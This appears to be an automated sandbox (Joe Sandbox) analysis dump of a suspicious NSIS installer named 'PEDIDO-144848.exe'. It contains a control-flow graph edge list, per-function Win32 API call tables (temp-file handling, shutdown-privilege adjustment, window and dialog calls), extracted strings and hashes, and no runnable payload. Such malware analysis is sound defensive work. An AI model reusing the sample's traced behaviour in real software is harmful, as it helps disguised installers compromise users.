5113->5112 5116 401c94 5114->5116 5117 401c48 5114->5117 5115->5114 5119 402ace 18 API calls 5116->5119 5118 402aac 18 API calls 5117->5118 5120 401c4d 5118->5120 5121 401c99 5119->5121 5122 402aac 18 API calls 5120->5122 5123 402ace 18 API calls 5121->5123 5124 401c59 5122->5124 5125 401ca2 FindWindowExA 5123->5125 5126 401c84 SendMessageA 5124->5126 5127 401c66 SendMessageTimeoutA 5124->5127 5128 401cc0 5125->5128 5126->5128 5127->5128 4262 401389 4264 401390 4262->4264 4263 4013fe 4264->4263 4265 4013cb MulDiv SendMessageA 4264->4265 4265->4264 5129 40270b 5130 402ace 18 API calls 5129->5130 5131 402712 FindFirstFileA 5130->5131 5132 402735 5131->5132 5136 402725 5131->5136 5133 40273c 5132->5133 5137 405cfe wsprintfA 5132->5137 5138 405da0 lstrcpynA 5133->5138 5137->5133 5138->5136 5139 401490 5140 404fb9 25 API calls 5139->5140 5141 401497 5140->5141 5142 402590 5143 402595 5142->5143 5144 4025a9 5142->5144 5145 402aac 18 API calls 5143->5145 5146 402ace 18 API calls 5144->5146 5148 40259e 5145->5148 5147 4025b0 lstrlenA 5146->5147 5147->5148 5149 405aba WriteFile 5148->5149 5150 4025d2 5148->5150 5149->5150 5151 402c13 5152 402c22 SetTimer 5151->5152 5154 402c3b 5151->5154 5152->5154 5153 402c90 5154->5153 5155 402c55 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 5154->5155 5155->5153 5156 404714 5157 404740 5156->5157 5158 404724 5156->5158 5160 404773 5157->5160 5161 404746 SHGetPathFromIDListA 5157->5161 5167 40557a GetDlgItemTextA 5158->5167 5163 404756 5161->5163 5166 40475d SendMessageA 5161->5166 5162 404731 SendMessageA 5162->5157 5164 40140b 2 API calls 5163->5164 5164->5166 5166->5160 5167->5162 4305 401d95 GetDC 4306 402aac 18 API calls 4305->4306 4307 401da7 GetDeviceCaps MulDiv ReleaseDC 4306->4307 4308 402aac 18 API calls 4307->4308 4309 401dd8 4308->4309 4310 405dc2 18 API calls 4309->4310 4311 401e15 CreateFontIndirectA 4310->4311 4312 40258a 4311->4312 4313 402695 4314 40269c 4313->4314 4316 40290b 4313->4316 4315 402aac 18 API calls 
4314->4315 4317 4026a3 4315->4317 4318 4026b2 SetFilePointer 4317->4318 4318->4316 4319 4026c2 4318->4319 4321 405cfe wsprintfA 4319->4321 4321->4316 5168 10001058 5170 10001074 5168->5170 5169 100010dc 5170->5169 5171 10001091 5170->5171 5172 100014bb GlobalFree 5170->5172 5173 100014bb GlobalFree 5171->5173 5172->5171 5174 100010a1 5173->5174 5175 100010b1 5174->5175 5176 100010a8 GlobalSize 5174->5176 5177 100010b5 GlobalAlloc 5175->5177 5178 100010c6 5175->5178 5176->5175 5179 100014e2 3 API calls 5177->5179 5180 100010d1 GlobalFree 5178->5180 5179->5178 5180->5169 5181 404099 lstrcpynA lstrlenA 5182 401d1a 5183 402aac 18 API calls 5182->5183 5184 401d28 SetWindowLongA 5183->5184 5185 40295e 5184->5185 4432 40159d 4433 402ace 18 API calls 4432->4433 4434 4015a4 SetFileAttributesA 4433->4434 4435 4015b6 4434->4435 5191 40149d 5192 4014ab PostQuitMessage 5191->5192 5193 4022dd 5191->5193 5192->5193 4436 401a1e 4437 402ace 18 API calls 4436->4437 4438 401a27 ExpandEnvironmentStringsA 4437->4438 4439 401a3b 4438->4439 4441 401a4e 4438->4441 4440 401a40 lstrcmpA 4439->4440 4439->4441 4440->4441 4620 40171f 4621 402ace 18 API calls 4620->4621 4622 401726 SearchPathA 4621->4622 4623 401741 4622->4623 5194 100010e0 5203 1000110e 5194->5203 5195 100011c4 GlobalFree 5196 100012ad 2 API calls 5196->5203 5197 100011c3 5197->5195 5198 10001266 2 API calls 5201 100011b1 GlobalFree 5198->5201 5199 10001155 GlobalAlloc 5199->5203 5200 100011ea GlobalFree 5200->5203 5201->5203 5202 100012d1 lstrcpyA 5202->5203 5203->5195 5203->5196 5203->5197 5203->5198 5203->5199 5203->5200 5203->5201 5203->5202 5204 10002162 5205 100021c0 5204->5205 5206 100021f6 5204->5206 5205->5206 5207 100021d2 GlobalAlloc 5205->5207 5207->5205 5208 401e25 5209 402aac 18 API calls 5208->5209 5210 401e2b 5209->5210 5211 402aac 18 API calls 5210->5211 5212 401e37 5211->5212 5213 401e43 ShowWindow 5212->5213 5214 401e4e EnableWindow 5212->5214 5215 40295e 5213->5215 5214->5215 5216 401f2d 5217 402ace 18 API 
calls 5216->5217 5218 401f34 5217->5218 5219 4060a4 2 API calls 5218->5219 5220 401f3a 5219->5220 5222 401f4c 5220->5222 5223 405cfe wsprintfA 5220->5223 5223->5222 5224 404f2d 5225 404f51 5224->5225 5226 404f3d 5224->5226 5227 404f59 IsWindowVisible 5225->5227 5235 404f70 5225->5235 5228 404f43 5226->5228 5229 404f9a 5226->5229 5227->5229 5230 404f66 5227->5230 5232 403fd1 SendMessageA 5228->5232 5231 404f9f CallWindowProcA 5229->5231 5237 404884 SendMessageA 5230->5237 5234 404f4d 5231->5234 5232->5234 5235->5231 5242 404904 5235->5242 5238 4048e3 SendMessageA 5237->5238 5239 4048a7 GetMessagePos ScreenToClient SendMessageA 5237->5239 5241 4048db 5238->5241 5240 4048e0 5239->5240 5239->5241 5240->5238 5241->5235 5251 405da0 lstrcpynA 5242->5251 5244 404917 5252 405cfe wsprintfA 5244->5252 5246 404921 5247 40140b 2 API calls 5246->5247 5248 40492a 5247->5248 5253 405da0 lstrcpynA 5248->5253 5250 404931 5250->5229 5251->5244 5252->5246 5253->5250 5254 403ab2 5255 403c05 5254->5255 5256 403aca 5254->5256 5258 403c56 5255->5258 5259 403c16 GetDlgItem GetDlgItem 5255->5259 5256->5255 5257 403ad6 5256->5257 5260 403ae1 SetWindowPos 5257->5260 5261 403af4 5257->5261 5263 403cb0 5258->5263 5272 401389 2 API calls 5258->5272 5262 403f85 19 API calls 5259->5262 5260->5261 5265 403b11 5261->5265 5266 403af9 ShowWindow 5261->5266 5267 403c40 SetClassLongA 5262->5267 5264 403fd1 SendMessageA 5263->5264 5268 403c00 5263->5268 5294 403cc2 5264->5294 5269 403b33 5265->5269 5270 403b19 DestroyWindow 5265->5270 5266->5265 5271 40140b 2 API calls 5267->5271 5274 403b38 SetWindowLongA 5269->5274 5275 403b49 5269->5275 5273 403f0e 5270->5273 5271->5258 5276 403c88 5272->5276 5273->5268 5283 403f3f ShowWindow 5273->5283 5274->5268 5280 403bc0 5275->5280 5281 403b55 GetDlgItem 5275->5281 5276->5263 5277 403c8c SendMessageA 5276->5277 5277->5268 5278 40140b 2 API calls 5278->5294 5279 403f10 DestroyWindow EndDialog 5279->5273 5282 403fec 8 API calls 5280->5282 5284 403b85 5281->5284 
5285 403b68 SendMessageA IsWindowEnabled 5281->5285 5282->5268 5283->5268 5287 403b92 5284->5287 5288 403bd9 SendMessageA 5284->5288 5289 403ba5 5284->5289 5297 403b8a 5284->5297 5285->5268 5285->5284 5286 405dc2 18 API calls 5286->5294 5287->5288 5287->5297 5288->5280 5292 403bc2 5289->5292 5293 403bad 5289->5293 5290 403f5e SendMessageA 5290->5280 5291 403f85 19 API calls 5291->5294 5296 40140b 2 API calls 5292->5296 5295 40140b 2 API calls 5293->5295 5294->5268 5294->5278 5294->5279 5294->5286 5294->5291 5298 403f85 19 API calls 5294->5298 5313 403e50 DestroyWindow 5294->5313 5295->5297 5296->5297 5297->5280 5297->5290 5299 403d3d GetDlgItem 5298->5299 5300 403d52 5299->5300 5301 403d5a ShowWindow EnableWindow 5299->5301 5300->5301 5322 403fa7 EnableWindow 5301->5322 5303 403d84 EnableWindow 5306 403d98 5303->5306 5304 403d9d GetSystemMenu EnableMenuItem SendMessageA 5305 403dcd SendMessageA 5304->5305 5304->5306 5305->5306 5306->5304 5323 403fba SendMessageA 5306->5323 5324 405da0 lstrcpynA 5306->5324 5309 403dfb lstrlenA 5310 405dc2 18 API calls 5309->5310 5311 403e0c SetWindowTextA 5310->5311 5312 401389 2 API calls 5311->5312 5312->5294 5313->5273 5314 403e6a CreateDialogParamA 5313->5314 5314->5273 5315 403e9d 5314->5315 5316 403f85 19 API calls 5315->5316 5317 403ea8 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 5316->5317 5318 401389 2 API calls 5317->5318 5319 403eee 5318->5319 5319->5268 5320 403ef6 ShowWindow 5319->5320 5321 403fd1 SendMessageA 5320->5321 5321->5273 5322->5303 5323->5306 5324->5309 5325 401eb3 5326 402ace 18 API calls 5325->5326 5327 401eb9 5326->5327 5328 404fb9 25 API calls 5327->5328 5329 401ec3 5328->5329 5330 405531 2 API calls 5329->5330 5333 401ec9 5330->5333 5331 401f1f CloseHandle 5335 402729 5331->5335 5332 401ee8 WaitForSingleObject 5332->5333 5334 401ef6 GetExitCodeProcess 5332->5334 5333->5331 5333->5332 5333->5335 5336 406175 2 API calls 5333->5336 5337 401f11 5334->5337 5338 401f08 5334->5338 5336->5332 5337->5331 
5340 405cfe wsprintfA 5338->5340 5340->5337 4327 402336 4328 402ace 18 API calls 4327->4328 4329 402347 4328->4329 4330 402ace 18 API calls 4329->4330 4331 402350 4330->4331 4332 402ace 18 API calls 4331->4332 4333 40235a GetPrivateProfileStringA 4332->4333 5341 404936 GetDlgItem GetDlgItem 5342 404988 7 API calls 5341->5342 5348 404ba0 5341->5348 5343 404a2b DeleteObject 5342->5343 5344 404a1e SendMessageA 5342->5344 5345 404a34 5343->5345 5344->5343 5346 404a6b 5345->5346 5347 405dc2 18 API calls 5345->5347 5349 403f85 19 API calls 5346->5349 5351 404a4d SendMessageA SendMessageA 5347->5351 5355 404c84 5348->5355 5358 404884 5 API calls 5348->5358 5378 404c11 5348->5378 5354 404a7f 5349->5354 5350 404d30 5352 404d42 5350->5352 5353 404d3a SendMessageA 5350->5353 5351->5345 5362 404d54 ImageList_Destroy 5352->5362 5363 404d5b 5352->5363 5373 404d6b 5352->5373 5353->5352 5359 403f85 19 API calls 5354->5359 5355->5350 5360 404cdd SendMessageA 5355->5360 5384 404b93 5355->5384 5356 403fec 8 API calls 5361 404f26 5356->5361 5357 404c76 SendMessageA 5357->5355 5358->5378 5379 404a8d 5359->5379 5364 404cf2 SendMessageA 5360->5364 5360->5384 5362->5363 5366 404d64 GlobalFree 5363->5366 5363->5373 5368 404d05 5364->5368 5365 404eda 5369 404eec ShowWindow GetDlgItem ShowWindow 5365->5369 5365->5384 5366->5373 5367 404b61 GetWindowLongA SetWindowLongA 5370 404b7a 5367->5370 5374 404d16 SendMessageA 5368->5374 5369->5384 5371 404b80 ShowWindow 5370->5371 5372 404b98 5370->5372 5392 403fba SendMessageA 5371->5392 5393 403fba SendMessageA 5372->5393 5373->5365 5383 404904 4 API calls 5373->5383 5388 404da6 5373->5388 5374->5350 5375 404b5b 5375->5367 5375->5370 5378->5355 5378->5357 5379->5367 5379->5375 5380 404adc SendMessageA 5379->5380 5381 404b18 SendMessageA 5379->5381 5382 404b29 SendMessageA 5379->5382 5380->5379 5381->5379 5382->5379 5383->5388 5384->5356 5385 404eb0 InvalidateRect 5385->5365 5386 404ec6 5385->5386 5389 40483f 21 API calls 5386->5389 5387 404dd4 
SendMessageA 5391 404dea 5387->5391 5388->5387 5388->5391 5389->5365 5390 404e5e SendMessageA SendMessageA 5390->5391 5391->5385 5391->5390 5392->5384 5393->5348 5394 4014b7 5395 4014bd 5394->5395 5396 401389 2 API calls 5395->5396 5397 4014c5 5396->5397 5398 401b39 5399 402ace 18 API calls 5398->5399 5400 401b40 5399->5400 5401 402aac 18 API calls 5400->5401 5402 401b49 wsprintfA 5401->5402 5403 40295e 5402->5403 5404 402939 SendMessageA 5405 402953 InvalidateRect 5404->5405 5406 40295e 5404->5406 5405->5406 4409 4015bb 4410 402ace 18 API calls 4409->4410 4411 4015c2 4410->4411 4412 4058ab 4 API calls 4411->4412 4425 4015ca 4412->4425 4413 401624 4415 401629 4413->4415 4417 401652 4413->4417 4414 40583d CharNextA 4414->4425 4428 401423 4415->4428 4419 401423 25 API calls 4417->4419 4424 40164a 4419->4424 4421 4054fc 2 API calls 4421->4425 4422 405519 5 API calls 4422->4425 4423 40163b SetCurrentDirectoryA 4423->4424 4425->4413 4425->4414 4425->4421 4425->4422 4426 40160c GetFileAttributesA 4425->4426 4427 40547f 4 API calls 4425->4427 4426->4425 4427->4425 4429 404fb9 25 API calls 4428->4429 4430 401431 4429->4430 4431 405da0 lstrcpynA 4430->4431 4431->4423 5407 4016bb 5408 402ace 18 API calls 5407->5408 5409 4016c1 GetFullPathNameA 5408->5409 5410 4016d8 5409->5410 5416 4016f9 5409->5416 5413 4060a4 2 API calls 5410->5413 5410->5416 5411 40170d GetShortPathNameA 5412 40295e 5411->5412 5414 4016e9 5413->5414 5414->5416 5417 405da0 lstrcpynA 5414->5417 5416->5411 5416->5412 5417->5416 5418 401d3b GetDlgItem GetClientRect 5419 402ace 18 API calls 5418->5419 5420 401d6b LoadImageA SendMessageA 5419->5420 5421 401d89 DeleteObject 5420->5421 5422 40295e 5420->5422 5421->5422

                                                        Control-flow Graph (first block 403180-4031b5; blocks marked Executed / Not Executed)
                                                        APIs
                                                        • SetErrorMode.KERNELBASE ref: 004031A5
                                                        • GetVersion.KERNEL32 ref: 004031AB
                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004031D4
                                                        • #17.COMCTL32(00000007,00000009), ref: 004031F6
                                                        • OleInitialize.OLE32(00000000), ref: 004031FD
                                                        • SHGetFileInfoA.SHELL32(0079D500,00000000,?,00000160,00000000), ref: 00403219
                                                        • GetCommandLineA.KERNEL32(Rse Setup,NSIS Error), ref: 0040322E
                                                        • GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\PEDIDO-144848.exe",00000000), ref: 00403241
                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\PEDIDO-144848.exe",00000020), ref: 0040326C
                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403369
                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040337A
                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403386
                                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040339A
                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004033A2
                                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004033B3
                                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004033BB
                                                        • DeleteFileA.KERNELBASE(1033), ref: 004033CF
                                                          • Part of subcall function 00406139: GetModuleHandleA.KERNEL32(?,?,?,004031EA,00000009), ref: 0040614B
                                                          • Part of subcall function 00406139: GetProcAddress.KERNEL32(00000000,?), ref: 00406166
                                                        • OleUninitialize.OLE32(?), ref: 0040347D
                                                        • ExitProcess.KERNEL32 ref: 0040349E
                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 004035BB
                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 004035C2
                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004035DA
                                                        • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004035F9
                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 0040361D
                                                        • ExitProcess.KERNEL32 ref: 00403640
                                                          • Part of subcall function 00405596: MessageBoxIndirectA.USER32(00409218), ref: 004055F1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
                                                        • String ID: "$"C:\Users\user\Desktop\PEDIDO-144848.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PEDIDO-144848.exe$C:\Users\user\slavelivets$C:\Users\user\slavelivets$Error launching installer$Low$NSIS Error$Rse Setup$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                        • API String ID: 3329125770-934152838
                                                        • Opcode ID: bbf1fb5b53fc7b28b57eed0d95e8f77975159f1cadf5f6a8baec224272584505
                                                        • Instruction ID: 9be49b359e088d3119d2258a489a24960a077000951b0681bd3593dcca7d42e2
                                                        • Opcode Fuzzy Hash: bbf1fb5b53fc7b28b57eed0d95e8f77975159f1cadf5f6a8baec224272584505
                                                        • Instruction Fuzzy Hash: 03C107706086816EE7116F719D4DA2F3EACAF86306F44457FF482B52E2C77C4A058B2E

                                                        Control-flow Graph (first block 405dc2-405dcd; blocks marked Executed / Not Executed)
                                                        APIs
                                                        • GetVersion.KERNEL32(00000006,0079DD20,00000000,00404FF1,0079DD20,00000000), ref: 00405E73
                                                        • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00405EEE
                                                        • GetWindowsDirectoryA.KERNEL32(Call,00000400), ref: 00405F01
                                                        • SHGetSpecialFolderLocation.SHELL32(?,0078FCF8), ref: 00405F3D
                                                        • SHGetPathFromIDListA.SHELL32(0078FCF8,Call), ref: 00405F4B
                                                        • CoTaskMemFree.OLE32(0078FCF8), ref: 00405F56
                                                        • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F78
                                                        • lstrlenA.KERNEL32(Call,00000006,0079DD20,00000000,00404FF1,0079DD20,00000000), ref: 00405FCA
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                                                        • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                        • API String ID: 900638850-1230650788
                                                        • Opcode ID: 8aaebd9e83df3b37401bec0d629d687f6ba259a9d136d118ad02b0f801d1bc8a
                                                        • Instruction ID: 6cdfcc9d134e5fa542626d346f44b404821d9f3efcf53b1aa70e88c92b4f8a03
                                                        • Opcode Fuzzy Hash: 8aaebd9e83df3b37401bec0d629d687f6ba259a9d136d118ad02b0f801d1bc8a
                                                        • Instruction Fuzzy Hash: A4610271A04A06AEEB115B24CC84BBF3BA8EB56314F54813BE541BA2D0D37D4981DF4E

                                                        Control-flow Graph (first block 405642-405668; blocks marked Executed / Not Executed)
                                                        APIs
                                                        • DeleteFileA.KERNELBASE(?,?,758B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040566B
                                                        • lstrcatA.KERNEL32(0079F548,\*.*,0079F548,?,?,758B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056B3
                                                        • lstrcatA.KERNEL32(?,00409014,?,0079F548,?,?,758B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056D4
                                                        • lstrlenA.KERNEL32(?,?,00409014,?,0079F548,?,?,758B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056DA
                                                        • FindFirstFileA.KERNEL32(0079F548,?,?,?,00409014,?,0079F548,?,?,758B3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004056EB
                                                        • FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405798
                                                        • FindClose.KERNEL32(00000000), ref: 004057A9
                                                        Strings
                                                        • "C:\Users\user\Desktop\PEDIDO-144848.exe", xrefs: 00405642
                                                        • \*.*, xrefs: 004056AD
                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 0040564F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                        • String ID: "C:\Users\user\Desktop\PEDIDO-144848.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
                                                        • API String ID: 2035342205-627893004
                                                        • Opcode ID: 66d41853b2e100f8aa5dc84de00091d649ca301df736d3cc4483c22267dac329
                                                        • Instruction ID: 760187f4f4892300bbc2109203202489edd73d97d78a60d5512a31c146a0733f
                                                        • Opcode Fuzzy Hash: 66d41853b2e100f8aa5dc84de00091d649ca301df736d3cc4483c22267dac329
                                                        • Instruction Fuzzy Hash: 8F51D631804A08EADB216B618C45BBF7B78DF42714F14813BF955721D1D77C8982EE6E

                                                        Control-flow Graph (first block 401759-40177c; blocks marked Executed / Not Executed)
                                                        APIs
                                                        • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\slavelivets,00000000,00000000,00000031), ref: 00401798
                                                        • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\slavelivets,00000000,00000000,00000031), ref: 004017C2
                                                          • Part of subcall function 00405DA0: lstrcpynA.KERNEL32(?,?,00000400,0040322E,Rse Setup,NSIS Error), ref: 00405DAD
                                                          • Part of subcall function 00404FB9: lstrlenA.KERNEL32(0079DD20,00000000,0078FCF8,758B23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000,?), ref: 00404FF2
                                                          • Part of subcall function 00404FB9: lstrlenA.KERNEL32(0040306B,0079DD20,00000000,0078FCF8,758B23A0,?,?,?,?,?,?,?,?,?,0040306B,00000000), ref: 00405002
                                                          • Part of subcall function 00404FB9: lstrcatA.KERNEL32(0079DD20,0040306B,0040306B,0079DD20,00000000,0078FCF8,758B23A0), ref: 00405015
                                                          • Part of subcall function 00404FB9: SetWindowTextA.USER32(0079DD20,0079DD20), ref: 00405027
                                                          • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040504D
                                                          • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405067
                                                          • Part of subcall function 00404FB9: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405075
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                        • String ID: C:\Users\user\AppData\Local\Temp\nsk7B73.tmp$C:\Users\user\AppData\Local\Temp\nsk7B73.tmp\System.dll$C:\Users\user\slavelivets$Call
                                                        • API String ID: 1941528284-3303909223
                                                        • Opcode ID: 17cbd14428586f76d7af50b729a9077a322d321e92e24f8c2541e02e22effdf4
                                                        • Instruction ID: dbbb128bf7935f0aed0e50e9380fc9841c9442f81e714e1827c6660095eaabca
                                                        • Opcode Fuzzy Hash: 17cbd14428586f76d7af50b729a9077a322d321e92e24f8c2541e02e22effdf4
                                                        • Instruction Fuzzy Hash: FE41E772910515BACB107BB5CC49DAF7AB9EF45368B20C23BF121F10E1C77C8A418A6D
                                                        APIs
                                                        • FindFirstFileA.KERNELBASE(758B3410,0079FD90,C:\,00405943,C:\,C:\,00000000,C:\,C:\,758B3410,?,C:\Users\user\AppData\Local\Temp\,00405662,?,758B3410,C:\Users\user\AppData\Local\Temp\), ref: 004060AF
                                                        • FindClose.KERNELBASE(00000000), ref: 004060BB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Find$CloseFileFirst
                                                        • String ID: C:\
                                                        • API String ID: 2295610775-3404278061
                                                        • Opcode ID: d30bbc16997dfcf9f9a572ec6341a2188e66bfdc939d37fad3f946c8dc482195
                                                        • Instruction ID: 4d264840bddbdcf8954fb0232b098af143b8be61859f100819b52cc90bd9207d
                                                        • Opcode Fuzzy Hash: d30bbc16997dfcf9f9a572ec6341a2188e66bfdc939d37fad3f946c8dc482195
                                                        • Instruction Fuzzy Hash: AAD0127595A1205BC71197787C0C84B7A589B053307114A32F46AF22E0D6349C7686E9

                                                        Control-flow Graph

                                                        APIs
                                                          • Part of subcall function 00406139: GetModuleHandleA.KERNEL32(?,?,?,004031EA,00000009), ref: 0040614B
                                                          • Part of subcall function 00406139: GetProcAddress.KERNEL32(00000000,?), ref: 00406166
                                                        • lstrcatA.KERNEL32(1033,0079E540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E540,00000000,00000002,758B3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\PEDIDO-144848.exe",00000000), ref: 0040379B
                                                        • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\slavelivets,1033,0079E540,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079E540,00000000,00000002,758B3410), ref: 00403810
                                                        • lstrcmpiA.KERNEL32(?,.exe), ref: 00403823
                                                        • GetFileAttributesA.KERNEL32(Call), ref: 0040382E
                                                        • LoadImageA.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\slavelivets), ref: 00403877
                                                          • Part of subcall function 00405CFE: wsprintfA.USER32 ref: 00405D0B
                                                        • RegisterClassA.USER32(007A16E0), ref: 004038B4
                                                        • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004038CC
                                                        • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403901
                                                        • ShowWindow.USER32(00000005,00000000), ref: 00403937
                                                        • GetClassInfoA.USER32(00000000,RichEdit20A,007A16E0), ref: 00403963
                                                        • GetClassInfoA.USER32(00000000,RichEdit,007A16E0), ref: 00403970
                                                        • RegisterClassA.USER32(007A16E0), ref: 00403979
                                                        • DialogBoxParamA.USER32(?,00000000,00403AB2,00000000), ref: 00403998
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                        • String ID: "C:\Users\user\Desktop\PEDIDO-144848.exe"$.DEFAULT\Control Panel\International$.exe$1033$@y$C:\Users\user\AppData\Local\Temp\$C:\Users\user\slavelivets$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                        • API String ID: 1975747703-3386698409
                                                        • Opcode ID: 72abac218aef0aa68c8201db2a2c7bc2da9bafc71593619d8738dd7e58f1acdc
                                                        • Instruction ID: 69823c21e20ed545a36681f3e22a73ce5ba8c54c43716b07ce110ef4df70eff0
                                                        • Opcode Fuzzy Hash: 72abac218aef0aa68c8201db2a2c7bc2da9bafc71593619d8738dd7e58f1acdc
                                                        • Instruction Fuzzy Hash: 1361D6B5544240AEE310BF619C45F3B3AACEB85789F40857FF941B22E2D77D9D018A2D

                                                        Control-flow Graph

                                                        APIs
                                                        • GetTickCount.KERNEL32 ref: 00402D0B
                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\PEDIDO-144848.exe,00000400), ref: 00402D27
                                                          • Part of subcall function 00405A13: GetFileAttributesA.KERNELBASE(?,00402D3A,C:\Users\user\Desktop\PEDIDO-144848.exe,80000000,?), ref: 00405A17
                                                          • Part of subcall function 00405A13: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405A39
                                                        • GetFileSize.KERNEL32(00000000,00000000,007AA000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PEDIDO-144848.exe,C:\Users\user\Desktop\PEDIDO-144848.exe,80000000,?), ref: 00402D73
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.115150573324.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_PEDIDO-144848.jbxd
                                                        Similarity
                                                        • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                        • String ID: "C:\Users\user\Desktop\PEDIDO-144848.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\PEDIDO-144848.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft${K
                                                        • API String ID: 4283519449-1924578707
